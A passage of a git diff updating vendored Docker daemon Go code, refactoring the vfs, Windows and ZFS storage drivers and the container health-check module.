parent, 0) +} + +func (d *Driver) create(id, parent string, size uint64) error { dir := d.dir(id) - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { + rootIDs := d.idMappings.RootPair() + if err := idtools.MkdirAllAndChown(filepath.Dir(dir), 0700, rootIDs); err != nil { return err } - if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0755, rootIDs); err != nil { return err } - if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil { - return err + + if size != 0 { + if err := d.setupQuota(dir, size); err != nil { + return err + } } + labelOpts := []string{"level:s0"} if _, mountLabel, err := label.InitLabels(labelOpts); err == nil { label.SetFileLabel(dir, mountLabel) @@ -102,10 +130,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if err != nil { return fmt.Errorf("%s: %s", parent, err) } - if err := CopyWithTar(parentDir, dir); err != nil { - return err - } - return nil + return CopyDir(parentDir.Path(), dir) } func (d *Driver) dir(id string) string { @@ -114,21 +139,18 @@ func (d *Driver) dir(id string) string { // Remove deletes the content from the directory for a given id. func (d *Driver) Remove(id string) error { - if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { - return err - } - return nil + return system.EnsureRemoveAll(d.dir(id)) } // Get returns the directory for the given id. -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { dir := d.dir(id) if st, err := os.Stat(dir); err != nil { - return "", err + return nil, err } else if !st.IsDir() { - return "", fmt.Errorf("%s: not a directory", dir) + return nil, fmt.Errorf("%s: not a directory", dir) } - return dir, nil + return containerfs.NewLocalContainerFS(dir), nil } // Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go new file mode 100644 index 0000000000..0d5c3a7b98 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go @@ -0,0 +1,26 @@ +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import ( + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/sirupsen/logrus" +) + +type driverQuota struct { + quotaCtl *quota.Control +} + +func setupDriverQuota(driver *Driver) { + if quotaCtl, err := quota.NewControl(driver.home); err == nil { + driver.quotaCtl = quotaCtl + } else if err != quota.ErrQuotaNotSupported { + logrus.Warnf("Unable to setup quota: %v\n", err) + } +} + +func (d *Driver) setupQuota(dir string, size uint64) error { + return d.quotaCtl.SetQuota(dir, quota.Quota{Size: size}) +} + +func (d *Driver) quotaSupported() bool { + return d.quotaCtl != nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go new file mode 100644 index 0000000000..3ae60ac07c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go @@ -0,0 +1,20 @@ +// +build !linux + +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import "github.com/docker/docker/daemon/graphdriver/quota" + +type driverQuota struct { +} + +func setupDriverQuota(driver *Driver) error { + return nil +} + +func (d *Driver) setupQuota(dir string, size uint64) error { + return quota.ErrQuotaNotSupported +} + +func (d *Driver) quotaSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go index 9ecf21dbaa..7c59ec32e2 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go @@ -1,6 +1,6 @@ // +build linux -package vfs +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" import ( "testing" @@ -32,6 +32,10 @@ func TestVfsCreateSnap(t *testing.T) { graphtest.DriverTestCreateSnap(t, "vfs") } +func TestVfsSetQuota(t *testing.T) { + graphtest.DriverTestSetQuota(t, "vfs", false) +} + func TestVfsTeardown(t *testing.T) { graphtest.PutDriver(t) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go index beac93ae75..16a5229206 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go @@ -1,6 +1,6 @@ //+build windows -package windows +package windows // import "github.com/docker/docker/daemon/graphdriver/windows" import ( "bufio" @@ -24,14 +24,16 @@ import ( "github.com/Microsoft/go-winio/archive/tar" "github.com/Microsoft/go-winio/backuptar" "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/longpath" "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/system" units "github.com/docker/go-units" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" ) @@ -93,6 +95,10 @@ func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home) } + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("windowsfilter failed to create '%s': %v", home, err) + } + d := &Driver{ info: hcsshim.DriverInfo{ HomeDir: home, @@ -119,7 +125,7 @@ func getFileSystemType(drive string) (fsType string, hr error) { modkernel32 = windows.NewLazySystemDLL("kernel32.dll") procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW") buf = make([]uint16, 255) - size = syscall.MAX_PATH + 1 + size = windows.MAX_PATH + 1 ) if len(drive) != 1 { hr = errors.New("getFileSystemType must be called with a drive letter") @@ -127,11 +133,11 @@ func getFileSystemType(drive string) (fsType string, hr error) { } drive += `:\` n := uintptr(unsafe.Pointer(nil)) - r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) + r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) if int32(r0) < 0 { hr = syscall.Errno(win32FromHresult(r0)) } - fsType = syscall.UTF16ToString(buf) + fsType = windows.UTF16ToString(buf) return } @@ -265,19 +271,35 @@ func (d *Driver) Remove(id string) error { // it is a transient error. Retry until it succeeds. var computeSystems []hcsshim.ContainerProperties retryCount := 0 + osv := system.GetOSVersion() for { - // Get and terminate any template VMs that are currently using the layer + // Get and terminate any template VMs that are currently using the layer. + // Note: It is unfortunate that we end up in the graphdrivers Remove() call + // for both containers and images, but the logic for template VMs is only + // needed for images - specifically we are looking to see if a base layer + // is in use by a template VM as a result of having started a Hyper-V + // container at some point. + // + // We have a retry loop for ErrVmcomputeOperationInvalidState and + // ErrVmcomputeOperationAccessIsDenied as there is a race condition + // in RS1 and RS2 building during enumeration when a silo is going away + // for example under it, in HCS. AccessIsDenied added to fix 30278. + // + // TODO @jhowardmsft - For RS3, we can remove the retries. Also consider + // using platform APIs (if available) to get this more succinctly. Also + // consider enhancing the Remove() interface to have context of why + // the remove is being called - that could improve efficiency by not + // enumerating compute systems during a remove of a container as it's + // not required. computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{}) if err != nil { - if err == hcsshim.ErrVmcomputeOperationInvalidState { - if retryCount >= 5 { - // If we are unable to get the list of containers - // go ahead and attempt to delete the layer anyway - // as it will most likely work. + if (osv.Build < 15139) && + ((err == hcsshim.ErrVmcomputeOperationInvalidState) || (err == hcsshim.ErrVmcomputeOperationAccessIsDenied)) { + if retryCount >= 500 { break } retryCount++ - time.Sleep(2 * time.Second) + time.Sleep(10 * time.Millisecond) continue } return err @@ -318,45 +340,53 @@ func (d *Driver) Remove(id string) error { return nil } +// GetLayerPath gets the layer path on host +func (d *Driver) GetLayerPath(id string) (string, error) { + return d.dir(id), nil +} + // Get returns the rootfs path for the id. This will mount the dir at its given path. -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel) var dir string rID, err := d.resolveID(id) if err != nil { - return "", err + return nil, err } if count := d.ctr.Increment(rID); count > 1 { - return d.cache[rID], nil + return containerfs.NewLocalContainerFS(d.cache[rID]), nil } // Getting the layer paths must be done outside of the lock. layerChain, err := d.getLayerChain(rID) if err != nil { d.ctr.Decrement(rID) - return "", err + return nil, err } if err := hcsshim.ActivateLayer(d.info, rID); err != nil { d.ctr.Decrement(rID) - return "", err + return nil, err } if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { d.ctr.Decrement(rID) if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { logrus.Warnf("Failed to Deactivate %s: %s", id, err) } - return "", err + return nil, err } mountPath, err := hcsshim.GetLayerMountPath(d.info, rID) if err != nil { d.ctr.Decrement(rID) + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + logrus.Warnf("Failed to Unprepare %s: %s", id, err) + } if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { logrus.Warnf("Failed to Deactivate %s: %s", id, err) } - return "", err + return nil, err } d.cacheMu.Lock() d.cache[rID] = mountPath @@ -370,7 +400,7 @@ func (d *Driver) Get(id, mountLabel string) (string, error) { dir = d.dir(id) } - return dir, nil + return containerfs.NewLocalContainerFS(dir), nil } // Put adds a new layer to the driver. @@ -385,9 +415,15 @@ func (d *Driver) Put(id string) error { return nil } d.cacheMu.Lock() + _, exists := d.cache[rID] delete(d.cache, rID) d.cacheMu.Unlock() + // If the cache was not populated, then the layer was left unprepared and deactivated + if !exists { + return nil + } + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { return err } @@ -395,7 +431,31 @@ func (d *Driver) Put(id string) error { } // Cleanup ensures the information the driver stores is properly removed. +// We use this opportunity to cleanup any -removing folders which may be +// still left if the daemon was killed while it was removing a layer. func (d *Driver) Cleanup() error { + items, err := ioutil.ReadDir(d.info.HomeDir) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + // Note we don't return an error below - it's possible the files + // are locked. However, next time around after the daemon exits, + // we likely will be able to to cleanup successfully. Instead we log + // warnings if there are errors. + for _, item := range items { + if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") { + if err := hcsshim.DestroyLayer(d.info, item.Name()); err != nil { + logrus.Warnf("Failed to cleanup %s: %s", item.Name(), err) + } else { + logrus.Infof("Cleaned up %s", item.Name()) + } + } + } + return nil } @@ -544,7 +604,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) { } defer d.Put(id) - return archive.ChangesSize(layerFs, changes), nil + return archive.ChangesSize(layerFs.Path(), changes), nil } // GetMetadata returns custom driver information. @@ -724,7 +784,7 @@ func writeLayerReexec() { } // writeLayer writes a layer from a tar file. -func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) { +func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (size int64, retErr error) { err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}) if err != nil { return 0, err @@ -749,17 +809,17 @@ func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths .. return 0, err } - size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id)) - if err != nil { - return 0, err - } - - err = w.Close() - if err != nil { - return 0, err - } + defer func() { + if err := w.Close(); err != nil { + // This error should not be discarded as a failure here + // could result in an invalid layer on disk + if retErr == nil { + retErr = err + } + } + }() - return size, nil + return writeLayerFromTar(layerData, w, filepath.Join(home, id)) } // resolveID computes the layerID information based on the given id. @@ -775,11 +835,7 @@ func (d *Driver) resolveID(id string) (string, error) { // setID stores the layerId in disk. func (d *Driver) setID(id, altID string) error { - err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) - if err != nil { - return err - } - return nil + return ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) } // getLayerChain returns the layer chain information. @@ -829,14 +885,16 @@ func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser var f *os.File // Open the file while holding the Windows backup privilege. This ensures that the // file can be opened even if the caller does not actually have access to it according - // to the security descriptor. + // to the security descriptor. Also use sequential file access to avoid depleting the + // standby list - Microsoft VSO Bug Tracker #9900466 err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { path := longpath.AddPrefix(filepath.Join(fg.path, filename)) - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return err } - h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN + h, err := windows.CreateFile(&p[0], windows.GENERIC_READ, windows.FILE_SHARE_READ, nil, windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS|fileFlagSequentialScan, 0) if err != nil { return &os.PathError{Op: "open", Path: path, Err: err} } @@ -878,8 +936,6 @@ func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) { return nil, err } options.size = uint64(size) - default: - return nil, fmt.Errorf("Unknown storage option: %s", key) } } return &options, nil diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go index 8e283ccf40..1d9153e171 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go @@ -1,6 +1,6 @@ -// +build linux freebsd solaris +// +build linux freebsd -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "fmt" @@ -10,16 +10,17 @@ import ( "strconv" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" - zfs "github.com/mistifyio/go-zfs" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/mistifyio/go-zfs" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) type zfsOptions struct { @@ -36,7 +37,7 @@ type Logger struct{} // Log wraps log message from ZFS driver with a prefix '[zfs]'. func (*Logger) Log(cmd []string) { - logrus.Debugf("[zfs] %s", strings.Join(cmd, " ")) + logrus.WithField("storage-driver", "zfs").Debugf("[zfs] %s", strings.Join(cmd, " ")) } // Init returns a new ZFS driver. @@ -45,14 +46,16 @@ func (*Logger) Log(cmd []string) { func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { var err error + logger := logrus.WithField("storage-driver", "zfs") + if _, err := exec.LookPath("zfs"); err != nil { - logrus.Debugf("[zfs] zfs command is not available: %v", err) + logger.Debugf("zfs command is not available: %v", err) return nil, graphdriver.ErrPrerequisites } file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600) if err != nil { - logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err) + logger.Debugf("cannot open /dev/zfs: %v", err) return nil, graphdriver.ErrPrerequisites } defer file.Close() @@ -103,13 +106,10 @@ func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdri if err != nil { return nil, fmt.Errorf("Failed to get root uid/guid: %v", err) } - if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(base, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, fmt.Errorf("Failed to create '%s': %v", base, err) } - if err := mount.MakePrivate(base); err != nil { - return nil, err - } d := &Driver{ dataset: rootDataset, options: options, @@ -141,19 +141,19 @@ func parseOptions(opt []string) (zfsOptions, error) { } func lookupZfsDataset(rootdir string) (string, error) { - var stat syscall.Stat_t - if err := syscall.Stat(rootdir, &stat); err != nil { + var stat unix.Stat_t + if err := unix.Stat(rootdir, &stat); err != nil { return "", fmt.Errorf("Failed to access '%s': %s", rootdir, err) } wantedDev := stat.Dev - mounts, err := mount.GetMounts() + mounts, err := mount.GetMounts(nil) if err != nil { return "", err } for _, m := range mounts { - if err := syscall.Stat(m.Mountpoint, &stat); err != nil { - logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) + if err := unix.Stat(m.Mountpoint, &stat); err != nil { + logrus.WithField("storage-driver", "zfs").Debugf("failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) continue // may fail on fuse file systems } @@ -180,7 +180,8 @@ func (d *Driver) String() string { return "zfs" } -// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +// Cleanup is called on daemon shutdown, it is a no-op for ZFS. +// TODO(@cpuguy83): Walk layer tree and check mounts? func (d *Driver) Cleanup() error { return nil } @@ -220,7 +221,10 @@ func (d *Driver) Status() [][2]string { // GetMetadata returns image/container metadata related to graph driver func (d *Driver) GetMetadata(id string) (map[string]string, error) { - return nil, nil + return map[string]string{ + "Mountpoint": d.mountPath(id), + "Dataset": d.zfsPath(id), + }, nil } func (d *Driver) cloneFilesystem(name, parentName string) error { @@ -353,41 +357,49 @@ func (d *Driver) Remove(id string) error { } // Get returns the mountpoint for the given id after creating the target directories if necessary. -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) { mountpoint := d.mountPath(id) if count := d.ctr.Increment(mountpoint); count > 1 { - return mountpoint, nil - } + return containerfs.NewLocalContainerFS(mountpoint), nil + } + defer func() { + if retErr != nil { + if c := d.ctr.Decrement(mountpoint); c <= 0 { + if mntErr := unix.Unmount(mountpoint, 0); mntErr != nil { + logrus.WithField("storage-driver", "zfs").Errorf("Error unmounting %v: %v", mountpoint, mntErr) + } + if rmErr := unix.Rmdir(mountpoint); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "zfs").Debugf("Failed to remove %s: %v", id, rmErr) + } + + } + } + }() filesystem := d.zfsPath(id) options := label.FormatMountLabel("", mountLabel) - logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options) + logrus.WithField("storage-driver", "zfs").Debugf(`mount("%s", "%s", "%s")`, filesystem, mountpoint, options) rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { - d.ctr.Decrement(mountpoint) - return "", err + return nil, err } // Create the target directories if they don't exist - if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil { - d.ctr.Decrement(mountpoint) - return "", err + if err := idtools.MkdirAllAndChown(mountpoint, 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil { - d.ctr.Decrement(mountpoint) - return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) + return nil, fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) } // this could be our first mount after creation of the filesystem, and the root dir may still have root // permissions instead of the remapped root uid:gid (if user namespaces are enabled): if err := os.Chown(mountpoint, rootUID, rootGID); err != nil { - mount.Unmount(mountpoint) - d.ctr.Decrement(mountpoint) - return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) + return nil, fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) } - return mountpoint, nil + return containerfs.NewLocalContainerFS(mountpoint), nil } // Put removes the existing mountpoint for the given id if it exists. @@ -396,16 +408,18 @@ func (d *Driver) Put(id string) error { if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint) - if err != nil || !mounted { - return err - } - logrus.Debugf(`[zfs] unmount("%s")`, mountpoint) + logger := logrus.WithField("storage-driver", "zfs") + + logger.Debugf(`unmount("%s")`, mountpoint) - if err := mount.Unmount(mountpoint); err != nil { - return fmt.Errorf("error unmounting to %s: %v", mountpoint, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Warnf("Failed to unmount %s mount %s: %v", id, mountpoint, err) } + if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) { + logger.Debugf("Failed to remove %s mount point %s: %v", id, mountpoint, err) + } + return nil } @@ -413,5 +427,5 @@ func (d *Driver) Put(id string) error { func (d *Driver) Exists(id string) bool { d.Lock() defer d.Unlock() - return d.filesystemsCache[d.zfsPath(id)] == true + return d.filesystemsCache[d.zfsPath(id)] } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go index 1c05fa794c..f15aae0596 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go @@ -1,23 +1,23 @@ -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "fmt" "strings" - "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func checkRootdirFs(rootdir string) error { - var buf syscall.Statfs_t - if err := syscall.Statfs(rootdir, &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(rootdir, &buf); err != nil { return fmt.Errorf("Failed to access '%s': %s", rootdir, err) } // on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... ] if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + logrus.WithField("storage-driver", "zfs").Debugf("no zfs dataset found for rootdir '%s'", rootdir) return graphdriver.ErrPrerequisites } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go index 52ed516049..589ecbd179 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go @@ -1,21 +1,22 @@ -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( - "fmt" - "syscall" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/sirupsen/logrus" ) -func checkRootdirFs(rootdir string) error { - var buf syscall.Statfs_t - if err := syscall.Statfs(rootdir, &buf); err != nil { - return fmt.Errorf("Failed to access '%s': %s", rootdir, err) +func checkRootdirFs(rootDir string) error { + fsMagic, err := graphdriver.GetFSMagic(rootDir) + if err != nil { + return err + } + backingFS := "unknown" + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFS = fsName } - if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + if fsMagic != graphdriver.FsMagicZfs { + logrus.WithField("root", rootDir).WithField("backingFS", backingFS).WithField("storage-driver", "zfs").Error("No zfs dataset found for root") return graphdriver.ErrPrerequisites } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go deleted file mode 100644 index bb4a85bd64..0000000000 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go +++ /dev/null @@ -1,59 +0,0 @@ -// +build solaris,cgo - -package zfs - -/* -#include -#include - -static inline struct statvfs *getstatfs(char *s) { - struct statvfs *buf; - int err; - buf = (struct statvfs *)malloc(sizeof(struct statvfs)); - err = statvfs(s, buf); - return buf; -} -*/ -import "C" -import ( - "path/filepath" - "strings" - "unsafe" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" -) - -func checkRootdirFs(rootdir string) error { - - cs := C.CString(filepath.Dir(rootdir)) - buf := C.getstatfs(cs) - - // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] - if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || - (buf.f_basetype[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) - C.free(unsafe.Pointer(buf)) - return graphdriver.ErrPrerequisites - } - - C.free(unsafe.Pointer(buf)) - C.free(unsafe.Pointer(cs)) - return nil -} - -/* rootfs is introduced to comply with the OCI spec -which states that root filesystem must be mounted at /rootfs/ instead of / -*/ -func getMountpoint(id string) string { - maxlen := 12 - - // we need to preserve filesystem suffix - suffix := strings.SplitN(id, "-", 2) - - if len(suffix) > 1 { - return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root") - } - - return filepath.Join(id[:maxlen], "rootfs", "root") -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go index 3e22928438..b5d6cb18c7 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go @@ -1,6 +1,6 @@ // +build linux -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "testing" @@ -27,7 +27,7 @@ func TestZfsCreateSnap(t *testing.T) { } func TestZfsSetQuota(t *testing.T) { - graphtest.DriverTestSetQuota(t, "zfs") + graphtest.DriverTestSetQuota(t, "zfs", true) } func TestZfsTeardown(t *testing.T) { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go index ce8daadaf6..1b77030684 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd,!solaris +// +build !linux,!freebsd -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" func checkRootdirFs(rootdir string) error { return nil diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go index 5b01dc0f40..ae0d7f8921 100644 --- a/vendor/github.com/docker/docker/daemon/health.go +++ b/vendor/github.com/docker/docker/daemon/health.go @@ -1,21 +1,20 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "bytes" + "context" "fmt" "runtime" "strings" "sync" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" "github.com/docker/docker/daemon/exec" + "github.com/sirupsen/logrus" ) const ( @@ -30,6 +29,10 @@ const ( // than this, the check is considered to have failed. defaultProbeTimeout = 30 * time.Second + // The time given for the container to start before the health check starts considering + // the container unstable. Defaults to none. + defaultStartPeriod = 0 * time.Second + // Default number of consecutive failures of the health check // for the container to be considered unhealthy. defaultProbeRetries = 3 @@ -41,8 +44,7 @@ const ( const ( // Exit status codes that can be returned by the probe command. - exitStatusHealthy = 0 // Container is healthy - exitStatusUnhealthy = 1 // Container is unhealthy + exitStatusHealthy = 0 // Container is healthy ) // probe implementations know how to run a particular type of probe. @@ -60,30 +62,39 @@ type cmdProbe struct { // exec the healthcheck command in the container. // Returns the exit code and probe output (if any) -func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) { - - cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:] +func (p *cmdProbe) run(ctx context.Context, d *Daemon, cntr *container.Container) (*types.HealthcheckResult, error) { + cmdSlice := strslice.StrSlice(cntr.Config.Healthcheck.Test)[1:] if p.shell { - cmdSlice = append(getShell(container.Config), cmdSlice...) + cmdSlice = append(getShell(cntr.Config), cmdSlice...) } entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice) execConfig := exec.NewConfig() execConfig.OpenStdin = false execConfig.OpenStdout = true execConfig.OpenStderr = true - execConfig.ContainerID = container.ID + execConfig.ContainerID = cntr.ID execConfig.DetachKeys = []byte{} execConfig.Entrypoint = entrypoint execConfig.Args = args execConfig.Tty = false execConfig.Privileged = false - execConfig.User = container.Config.User + execConfig.User = cntr.Config.User + execConfig.WorkingDir = cntr.Config.WorkingDir + + linkedEnv, err := d.setupLinkedContainers(cntr) + if err != nil { + return nil, err + } + execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(execConfig.Tty, linkedEnv), execConfig.Env) - d.registerExecCommand(container, execConfig) - d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + d.registerExecCommand(cntr, execConfig) + attributes := map[string]string{ + 